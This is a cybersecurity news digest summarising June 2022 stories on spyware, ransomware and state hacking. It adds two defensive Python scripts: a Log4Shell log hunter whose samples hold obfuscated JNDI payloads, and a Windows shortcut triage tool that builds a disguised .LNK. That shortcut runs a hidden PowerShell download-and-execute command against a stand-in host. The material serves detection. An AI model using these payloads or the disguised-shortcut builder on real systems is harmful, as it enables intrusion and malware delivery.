Friday, June 24, 2022 // (IG): BB //Weekly Sponsor: UNDERWORLD BJJ
'Universal processor' company Tachyum joins European HPC think tank
FROM THE MEDIA: Tachyum, the outfit aiming to develop a "universal processor" for HPC and artificial intelligence workloads, has joined the European Technology Platform for High Performance Computing (ETP4HPC), a think-tank promoting European HPC research and innovation.
The Slovakian company put out an FPGA prototype last year, which, as we noted at the time, is still a long way from proving the company's bold claims.
The "Prodigy" chipmaker said it had been accepted as an associated SME member of ETP4HPC, an industry-led non-profit association set up to drive the economic and societal benefits of HPC for European science and industry. The organization counts Intel, HPE, Dell, Atos and Arm among its many members.
READ THE STORY: The Register
NSO claims 'more than 5' EU states use Pegasus spyware
FROM THE MEDIA: NSO Group told European lawmakers this week that "under 50" customers use its notorious Pegasus spyware, though these customers include "more than five" European Union member states.
The surveillance-ware maker's General Counsel Chaim Gelfand refused to answer specific questions about the company's customers during a European Parliament committee meeting on Thursday.
Instead, he frequently repeated the company line that NSO exclusively sells its spyware to government agencies — not private companies or individuals — and only "for the purpose of preventing and investigating terrorism and other serious crimes."
READ THE STORY: The Register
Chinese Threat Actor Uses Ransomware As a ‘Smokescreen’ For Espionage
FROM THE MEDIA: A China-based threat actor has been launching ransomware attacks against organizations in the U.S. and other countries, but evidence suggests that the ransomware is being used as a "smokescreen" to disguise the true espionage motives behind its campaigns.
The Bronze Starlight actor (also called DEV-0401 by Microsoft), active since early 2021, has been known to leverage a previously disclosed, custom DLL loader called HUI Loader in order to deploy Cobalt Strike and PlugX payloads for command and control as part of its attacks. Over the past year, the threat actor has relied on a lineup of five ransomware families - LockFile, AtomSilo, Rook, Night Sky and Pandora - and posted 21 victims to name-and-shame leak sites as of mid-April.
READ THE STORY: DUO
Avos ransomware threat actor updates its attack arsenal
FROM THE MEDIA: AvosLocker currently supports Windows, Linux and ESXi environments and provides automatic, highly configurable builds of the AvosLocker malware. In addition, the threat actor provides affiliates with a control panel, a negotiation panel with push and sound notifications, decryption tests, and access to a diverse network of penetration testers, initial access brokers and other contacts. Avos also offers calling and DDoS services: affiliates can have victims phoned to pressure them into paying the ransom, or have DDoS attacks launched during negotiations to add stress to the situation.
AvosLocker has already targeted critical infrastructure sectors in the US, including financial services, manufacturing and government facilities, according to the FBI. The Avos team does not allow attacks against post-Soviet countries. A user nicknamed "Avos" has been observed on a Russian-language forum trying to recruit penetration testers with experience in Active Directory networks, as well as initial access brokers.
READ THE STORY: TechRepublic
The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance
FROM THE MEDIA: CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited.
The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT), this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and Mitel has published an associated security advisory.
READ THE STORY: Crowdstrike
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
FROM THE MEDIA: The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
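The advisory's core recommendation is to hunt for exploitation attempts on Horizon and UAG servers that were exposed before patching. The following hunting script is an added example, not part of the CISA/CGCYBER advisory: it scans access-log style lines for Log4j lookup strings, first peeling away the nested-lookup obfuscations (${lower:j}, ${::-j}, ${env:X:-j}) and URL-encoding that attackers used to slip past naive string matching. The log lines are constructed for the example, with RFC 5737 documentation addresses.

```python
"""Hunt for Log4Shell (CVE-2021-44228) lookup strings in web or Horizon
request logs, peeling the common nested-lookup obfuscations first.
Added example; the log lines below are constructed, not real captures."""
import re
from urllib.parse import unquote

# ${lower:j} / ${upper:J} -> j ;  ${::-j} and ${env:ANY:-j} -> the default value j
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.I)
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$]*:-([^{}$]*)\}")
JNDI = re.compile(r"\$\{jndi:(ldaps|ldap|rmi|dns|iiop|corba|nds|http):", re.I)


def normalize(s: str) -> str:
    """Undo (double) URL-encoding and collapse nested lookups until stable."""
    s = unquote(unquote(s))
    prev = None
    while prev != s:                      # each pass strips one nesting level
        prev = s
        s = CASE_LOOKUP.sub(lambda m: m.group(1), s)
        s = DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
    return s.lower()


def find_log4shell(lines):
    """Return (line_no, jndi_scheme, normalized_snippet) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((n, m.group(1), norm[m.start():m.start() + 80]))
    return hits


# Constructed sample: one benign request, then four exploitation attempts.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Jun/2022:08:14:02 +0000] "GET /portal/webclient/index.html '
    'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Jun/2022:08:15:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '192.0.2.44 - - [20/Jun/2022:08:16:40 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://192.0.2.44:1389/x}"',
    '192.0.2.44 - - [20/Jun/2022:08:17:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://192.0.2.44:1099/y}"',
    '198.51.100.23 - - [20/Jun/2022:08:19:27 +0000] "GET /portal/?q=%24%7B%24%7Benv%3A'
    'NaN%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fz%7D HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for line_no, scheme, snippet in find_log4shell(SAMPLE_LOG):
        print(f"line {line_no}: jndi/{scheme} -> {snippet}")
```

A hit tells you only that an attempt reached the server; it does not tell you whether the lookup fired. Pair it with egress records (outbound LDAP/RMI to the address in the payload) and with the advisory's host-based indicators to decide whether the box was actually compromised.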
New 'Quantum' Builder Lets Attackers Easily Create Malicious Windows Shortcuts
FROM THE MEDIA: A new malware tool that enables cybercriminal actors to build malicious Windows shortcut (.LNK) files has been spotted for sale on cybercrime forums. Dubbed Quantum Lnk Builder, the software makes it possible to spoof any extension and choose from over 300 icons, and is advertised as supporting UAC and Windows SmartScreen bypass as well as "multiple payloads per .LNK" file. Also offered are capabilities to generate .HTA and disk image (.ISO) payloads.
Quantum Builder is available for lease at different price points: €189 a month, €355 for two months, €899 for six months, or as a one-off lifetime purchase for €1,500.
READ THE STORY: THN
Why think tanks are such juicy targets for cyberspies
FROM THE MEDIA: A new report from Microsoft puts a spotlight on the cyberfront of the Russian invasion of Ukraine — including cyberespionage against think tanks outside Ukraine which can be valuable targets for intelligence gathering or launchpads for additional campaigns.
In the report released Wednesday, Microsoft said it “has detected Russian network intrusion efforts on 128 targets in 42 countries outside Ukraine.” Roughly half of the attacks targeted government agencies, but 12 percent were non-government organizations (NGOs), primarily think tanks with foreign policy expertise or groups assisting in the humanitarian efforts to assist Ukrainian refugees, according to the company.
READ THE STORY: The Record
Automotive hose maker Nichirin hit by ransomware attack
FROM THE MEDIA: Nichirin-Flex U.S.A, a subsidiary of the Japanese car and motorcycle hose maker Nichirin, has been hit by a ransomware attack that forced the company to take its network offline. The attack occurred on June 14, 2022; the company reacted as soon as it detected the unauthorized access on its network and moved operations into manual mode. Customers should expect delays in receiving their orders, since the cyberattack also affected product distribution and orders are being fulfilled manually.
In an official statement [PDF, Japanese] yesterday, Nichirin underlines that system recovery has been prioritized to resume business operations. The company is currently investigating how the unauthorized access happened and is trying to determine "the effects of information leakage."
READ THE STORY: BleepingComputer
Ransomware, IP & data theft top concerns for Indian pharma firms
FROM THE MEDIA: Ransomware attacks and IP and data theft are the top cybersecurity concerns for pharma companies in India as they take the digital leap, a new report showed on Thursday. The pandemic and a rising number of targeted attacks have prompted certain pharma companies to double their cybersecurity investments, according to the report by Deloitte India-Data Security Council of India (DSCI).
"To be able to scale this digital vision and create trust globally, the pharma sector must recognize cybersecurity as a key lever, working towards bolstering security around data, operational technologies (OT), and across the supply chain," said Gaurav Shukla, Partner and Leader, Cyber, Deloitte India. "This ability to utilize cybersecurity as a key enabler for business and digital transformation can help pharma organizations make the transition from a leader to a trusted leader," Shukla added.
READ THE STORY: Gadgetsnow
The Rise, Fall, and Rebirth of the Presumption of Compromise
FROM THE MEDIA: In cybersecurity, we often say that "prevention is ideal, but detection is a must." But why do we say that? Shouldn't both prevention and detection be musts in a layered, defense-in-depth security approach? Well, this saying is rooted in a realistic assessment: we, as cyber-defense professionals, have come to accept that it's almost impossible to prevent the bad guys from breaking into connected systems. The choices are either total isolation (which, in some cases, can be circumvented) or accepting the risk of a breach. This notion of failing prevention has become a linchpin of modern defense strategy and is known as the "presumption of compromise." That is, assume that you have already been breached and focus on never-ending detection and eradication of the badness lurking in your systems.
READ THE STORY: Darkreading
Microsoft: Russia Stepping Up Hacking, Cyber Penetration Efforts on 42 Ukraine Allies
FROM THE MEDIA: Four months into its war on Ukraine, Russia is carrying out cyber operations on much more than its neighbor, according to a report released by Microsoft Thursday.
In the report, Microsoft said it detected Russian network intrusion efforts in 128 organizations in 42 countries outside Ukraine, with the majority of its “strategic espionage” focused on governments, think tanks, aid groups and businesses. Russia has most often targeted the U.S. and other NATO countries, including Poland, where military logistics and humanitarian assistance is being coordinated.
READ THE STORY: NextGov
Uh oh, malicious Windows shortcuts are making a return
FROM THE MEDIA: At least two threat actors have recently been observed distributing malicious Windows shortcut files designed to infect victims with malware. Late last week, cybersecurity researchers from Varonis reported seeing the dreaded Emotet threat actor, as well as the lesser-known Golden Chickens group (AKA Venom Spider), distributing .ZIP archives via email, and in those archives, .LNK files. Using Windows shortcut files to deploy malware or ransomware on the target endpoint is not exactly novel, but these threat actors have given the idea a brand new spin.
In this particular campaign, the threat actors replaced the original shortcut icon with that of a .PDF file, so that the unsuspecting victim, once they receive the email attachment, can’t spot the difference with a basic visual inspection.
READ THE STORY: TechRadar
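Both this Varonis report and the Quantum Lnk Builder item above rely on the same handful of shortcut tricks: a script-host target (cmd.exe, PowerShell, mshta) dressed in a document icon, a minimised or hidden window, a download-and-execute command line, and a double extension that Explorer hides because .lnk is never shown. The script below is an added example, not code from Varonis or the builder's authors: it decodes the .LNK header and StringData as laid out in Microsoft's MS-SHLLINK specification and scores a shortcut on those signals. The two sample shortcuts, including the Acrobat Reader icon path, are constructed inline for the example rather than taken from a real campaign.

```python
"""Static triage of Windows .LNK (MS-SHLLINK) files: decode the header and
StringData, then flag icon/target mismatches, hidden windows, script-host
targets and double extensions. Added example with constructed samples."""
import struct
from dataclasses import dataclass
from pathlib import PureWindowsPath

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7          # ShowCommand value that starts the window minimised

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
SUSPICIOUS_ARGS = ("-enc", "-w hidden", "iex", "http://", "https://",
                   "downloadstring", "invoke-webrequest", "bitsadmin")


@dataclass
class Lnk:
    flags: int
    show_cmd: int
    icon_index: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    args: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes) -> Lnk:
    """Decode the 76-byte header and the StringData block; the optional
    LinkTargetIDList and LinkInfo structures are skipped by size, not parsed."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags, = struct.unpack_from("<I", data, 20)
    icon_index, show_cmd = struct.unpack_from("<iI", data, 56)
    pos = 76
    if flags & HAS_IDLIST:          # uint16 IDListSize, then that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:        # first uint32 is the size of the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    enc, width = ("utf-16-le", 2) if flags & IS_UNICODE else ("cp1252", 1)
    lnk = Lnk(flags, show_cmd, icon_index)
    # StringData sections come in this fixed order, each present only if its flag is set
    for bit, attr in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "args"),
                      (HAS_ICON, "icon_location")):
        if flags & bit:
            count, = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
            pos += 2
            setattr(lnk, attr, data[pos:pos + count * width].decode(enc))
            pos += count * width
    return lnk


def triage(lnk: Lnk, filename: str) -> list[str]:
    """Return the reasons a shortcut looks like a disguised loader (empty if none)."""
    findings = []
    target = PureWindowsPath(lnk.relative_path).name.lower()
    icon = PureWindowsPath(lnk.icon_location).name.lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"target is script host {target}")
        if lnk.icon_location and icon != target:      # icon borrowed from another program
            findings.append(f"icon borrowed from {icon} (index {lnk.icon_index})")
    if lnk.show_cmd == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised")
    hits = [t for t in SUSPICIOUS_ARGS if t in lnk.args.lower()]
    if hits:
        findings.append("suspicious arguments: " + ", ".join(hits))
    stem = filename.lower().removesuffix(".lnk")
    if "." in stem:                 # Explorer hides .lnk, so Invoice.pdf.lnk shows as Invoice.pdf
        findings.append(f"double extension masquerading as .{stem.rsplit('.', 1)[1]}")
    return findings


def build_lnk(relative_path: str, args: str, icon_location: str,
              icon_index: int, show_cmd: int = 1) -> bytes:
    """Assemble a minimal Unicode shortcut (no IDList/LinkInfo) for testing."""
    flags = HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, icon_index, show_cmd, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, args, icon_location))
    return header + body


# Constructed samples (not real-world captures): a disguised loader and a benign shortcut.
MALICIOUS_NAME = "Invoice_2022-06.pdf.lnk"
MALICIOUS_LNK = build_lnk(
    r"..\..\Windows\System32\cmd.exe",
    "/c powershell -w hidden -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/x')\"",
    r"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe", 0,
    show_cmd=SW_SHOWMINNOACTIVE)
BENIGN_NAME = "Notepad++.lnk"
BENIGN_LNK = build_lnk(r"..\Program Files\Notepad++\notepad++.exe", "", "", 0)

if __name__ == "__main__":
    for name, blob in ((MALICIOUS_NAME, MALICIOUS_LNK), (BENIGN_NAME, BENIGN_LNK)):
        print(name, triage(parse_lnk(blob), name) or ["clean"])
```

Real samples often carry the target in the LinkTargetIDList rather than the relative path; the parser skips that structure, so a production version would decode the ItemID list too. The signals themselves transfer as-is to mail-gateway or EDR rules: a shortcut inside an archive attachment whose target is a script host and whose icon is not that host's own is worth quarantining regardless of what the command line looks like.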
Iranian cyber-attackers trying, and so far failing, to create panic in Israel
FROM THE MEDIA: Iranian cyber-attackers targeting Israel have focused on trying to create panic; however, they have not activated advanced cyber-attack capabilities, say observers in Israel while cautioning that the hostile actors will continue to search for new vulnerabilities.
This month, Iranian cyber-attackers reportedly activated rocket sirens belonging to municipal authorities in Jerusalem and Eilat, as well as targeting the emails of senior Israeli and American officials and executives.
In November, a series of cyber strikes targeted Iranian gas stations and highway signs across the country, reportedly disabling every gas station in the country, while hijacking displays and screening subversive anti-regime messages.
READ THE STORY: JNS
As China shuts out the world, internet access from abroad gets harder, too
FROM THE MEDIA: Most internet users trying to get past China’s Great Firewall search for a cyber tunnel that will take them outside censorship restrictions to the wider web. But Vincent Brussee is looking for a way in, so he can better glimpse what life is like under the Communist Party.
An analyst with the Mercator Institute for China Studies in Berlin, Brussee frequently scours the Chinese internet for data. His main focus is information that will help him understand China’s burgeoning social credit system. But in the last few years, he’s noticed that his usual sources have become more unreliable and access tougher to gain.
READ THE STORY: Stripes
Exporting Repression: 'Made In' Labels Not as Important as Technology Itself
FROM THE MEDIA: The United States government has imposed restrictions on certain Chinese companies citing threats to U.S. security. In some cases, this means U.S. businesses are prohibited from doing business with those Chinese companies unless they first get a license to do so. In other cases, this means the U.S. government itself is prohibited from purchasing supplies from those companies.
The deputy assistant secretary of defense for cyber policy said when it comes to restrictions on Chinese technology, it's not the "made in China" label alone that warrants such restrictions — it's what the technology is designed to do.
"I think one of the challenges when we talk about these things, there's a sort of temptation to say this is about a 'Made in China' label versus a 'Made in U.S.' label," said Mieke Eoyang, who spoke Tuesday during a discussion in Washington, D.C. which was hosted by the think tank Third Way. "It really is about the difference in technology approaches and what that means for us from a security perspective."
READ THE STORY: Defense
Chinese APT Group Likely Using Ransomware Attacks as Cover for IP Theft
FROM THE MEDIA: A China-based advanced persistent threat (APT) actor, active since early 2021, appears to be using ransomware and double-extortion attacks as camouflage for systematic, government-sponsored cyberespionage and intellectual property theft.
In all of the attacks, the threat actor has used a malware loader called the HUI Loader — associated exclusively with China-backed groups — to load Cobalt Strike Beacon and then deploy ransomware on compromised hosts. Researchers at Secureworks who are tracking the group as “Bronze Starlight” say it’s a tactic they have not observed other threat actors use.
READ THE STORY: DarkReading
ICEFALL advice and reactions
FROM THE MEDIA: CISA yesterday noted Forescout's report of the widespread industrial control system (ICS) vulnerabilities the researchers call, collectively, ICEFALL, and CISA has advised attention to the Forescout report and the mitigation recommendations it contains. CISA also pointed out that five of its recent alerts address issues associated with ICEFALL: ICSA-22-172-02 (JTEKT TOYOPUC), ICSA-22-172-03 (Phoenix Contact Classic Line Controllers), ICSA-22-172-04 (Phoenix Contact ProConOS and MULTIPROG), ICSA-22-172-05 (Phoenix Contact Classic Line Industrial Controllers) and ICSA-22-172-06 (Siemens WinCC OA).
SecurityWeek has a round-up of industry comments on ICEFALL. In general, the experts aren't surprised that vulnerabilities of this kind were found, and they're in agreement that ICEFALL is to be taken seriously, and the available remediations applied.
READ THE STORY: The Cyber Wire
Iranian Spear Phishing Operation Targeting US and Israeli Government Figures, Email Account Takeovers Lead to Impersonation Campaigns
FROM THE MEDIA: State-backed hacking groups from Russia and China have been dominating the news cycle as of late, but Iran is reminding the world that it has its own assembly of advanced persistent threat (APT) groups with an espionage campaign targeting high-level members of the government and military of the United States and Israel. The campaign uses spear phishing to gain access to emails, leveraging the account takeover to join in existing conversations and steer them toward supplying login credentials and intelligence.
The spear phishing campaign was uncovered by security firm Check Point Research (CPR) after being notified of suspicious emails by a prominent client in Israel. The security researchers believe it has been going on since at least December 2021 and has targeted a number of Israeli government and military leaders as well as a former US ambassador to Israel.
READ THE STORY: CPO MAG
Cisco quits Moscow
FROM THE MEDIA: Cisco has decided it's time to leave Russia and Belarus, almost four months after stopping operations in response to Russia's illegal invasion of Ukraine. The networking giant announced it would halt operations in Russia and Belarus "for the foreseeable future" on March 3 this year. A June 23 update suggests Cisco sees no future in either nation.
"We have now made the decision to begin an orderly wind-down of our business in Russia and Belarus," the statement reads. The company also promises to "communicate directly with customers, partners, and vendors to settle our financial matters, including refunding prepaid service and software arrangements, to the extent permissible under applicable laws and regulations."
READ THE STORY: The Register
Items of interest
Lithuania warns of rise in DDoS attacks against government sites
FROM THE MEDIA: The National Cyber Security Center (NKSC) of Lithuania has issued a public warning about a steep increase in distributed denial of service (DDoS) attacks directed against public authorities in the country.
A DDoS attack overwhelms internet-facing servers with a flood of requests and junk traffic, rendering the hosted sites and services inaccessible to legitimate visitors and users.
According to NKSC, due to these cyberattacks, Lithuania's transportation agencies, financial institutions, and other large entities have experienced temporary service disruptions.
READ THE STORY: BleepingComputer
Six street view applications to explore the world (Video)
FROM THE MEDIA: Street view applications and sites are a great resource for researching locations and seeing what places look like on the ground. Whether you're looking to confirm a geolocation you might have done, looking to identify what might be in an area, or are just curious to see what other pockets of the world look like, street view tools can be extremely useful.
How to map anything with freely available location data (Video)
FROM THE MEDIA: I have also included a few examples in the video, such as mapping CCTV cameras in Munich, or gas well sites in Australia. Please do look around the wiki that I have linked to, as there are lots of opportunities to collect and map data based on what you are investigating, researching, or interested in.
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends regarding cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com